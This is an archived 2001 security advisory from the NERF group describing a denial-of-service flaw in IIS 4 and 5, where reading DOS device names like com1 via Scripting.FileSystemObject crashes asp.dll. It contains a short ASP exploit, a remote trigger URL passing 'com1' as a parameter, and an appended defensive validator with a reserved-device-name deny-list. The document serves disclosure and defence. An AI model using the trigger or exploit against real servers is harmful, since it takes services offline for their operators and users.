nerf.iis.dos.txt

12 Jul 2001 00:00:00 | Reported by Buggzy | Type: packetstorm | Source: packetstormsecurity.com

MS IIS local and remote DoS vulnerabilities due to Scripting.FileSystemObject misuse.

` --== NERF gr0up security advisory #4 ==--   
MS IIS local and remote DoS   
  
1. Vulnerable software: IIS 4, 5  
  
2. Description:  
Opening and reading device files (com1, com2, etc.) using Scripting.FileSystemObject will crash the ASP processor (asp.dll).  
  
3. Local exploit:  
If you have permission to create an .asp file, you can crash the ASP processor.  
  
4. Remote exploit:  
Sometimes a file name is passed as a parameter to an ASP script, which opens and reads data from that file. Passing a device file name as the parameter will  
crash the ASP processor.  
http://host.int/scripts/script.asp?script=com1  
  
5. Solution:  
Fix Scripting.FileSystemObject (it has to check that the file exists before opening it).  
  
6. ASP-Exploit:  
  
<%  
Dim strFileName, objFSO, objFile  
  
Set objFSO = Server.CreateObject("Scripting.FileSystemObject")  
  
strFileName = "com1"  
  
Set objFile = objFSO.OpenTextFile(strFileName)  
  
Response.Write objFile.ReadAll  
  
objFile.Close  
  
%>  
  
7. Sorry:  
for poor English  
---------------------------------------------------  
Found by buggzy ([email protected])  
NERF Security gr0up (www.nerf.ru), Russia, 2001 (c)  
`
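
An application-side check for the remote case in section 4, written as an added example that is not part of the NERF advisory or of any Microsoft fix. It validates the `script` parameter before it reaches `OpenTextFile`; `BASE_DIR`, the `.txt`-only allow-list and the helper names are assumptions for illustration, and the device-name list follows the Win32 reserved names (CON, PRN, AUX, NUL, COMn, LPTn).

```vbscript
<%
Option Explicit
' Added example: hypothetical hardened wrapper around the pattern in section 4.
Const BASE_DIR = "D:\webdata\includes\"   ' assumed content directory

' True when the name resolves to a DOS device. Win32 ignores the extension
' and surrounding spaces, so "com1.txt" and "COM1 .txt" still name the device.
Function IsReservedDeviceName(ByVal name)
    Dim base, dotPos, re
    base = UCase(Trim(name))
    dotPos = InStr(base, ".")
    If dotPos > 0 Then base = Left(base, dotPos - 1)
    base = Trim(base)
    Set re = New RegExp
    re.Pattern = "^(CON|PRN|AUX|NUL|COM[0-9]|LPT[0-9])$"
    IsReservedDeviceName = re.Test(base)
End Function

' Allow-list first (no path separators, colons or extra dots), then the
' device-name deny-list as a second layer.
Function IsSafeFileName(ByVal name)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[A-Za-z0-9_-]{1,64}\.txt$"
    IsSafeFileName = re.Test(name) And Not IsReservedDeviceName(name)
End Function

Dim strParam, strPath, objFSO, objFile
strParam = CStr(Request.QueryString("script"))

If Not IsSafeFileName(strParam) Then
    Response.Status = "400 Bad Request"
    Response.End
End If

Set objFSO = Server.CreateObject("Scripting.FileSystemObject")
strPath = BASE_DIR & strParam

' Open only regular files that exist under the fixed base directory.
If Not objFSO.FileExists(strPath) Then
    Response.Status = "404 Not Found"
    Response.End
End If

Set objFile = objFSO.OpenTextFile(strPath, 1)   ' 1 = ForReading
If Not objFile.AtEndOfStream Then
    Response.Write Server.HTMLEncode(objFile.ReadAll)
End If
objFile.Close
%>
```

This does not address the local case in section 3, where the author of the .asp file controls the name passed to `OpenTextFile` directly.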
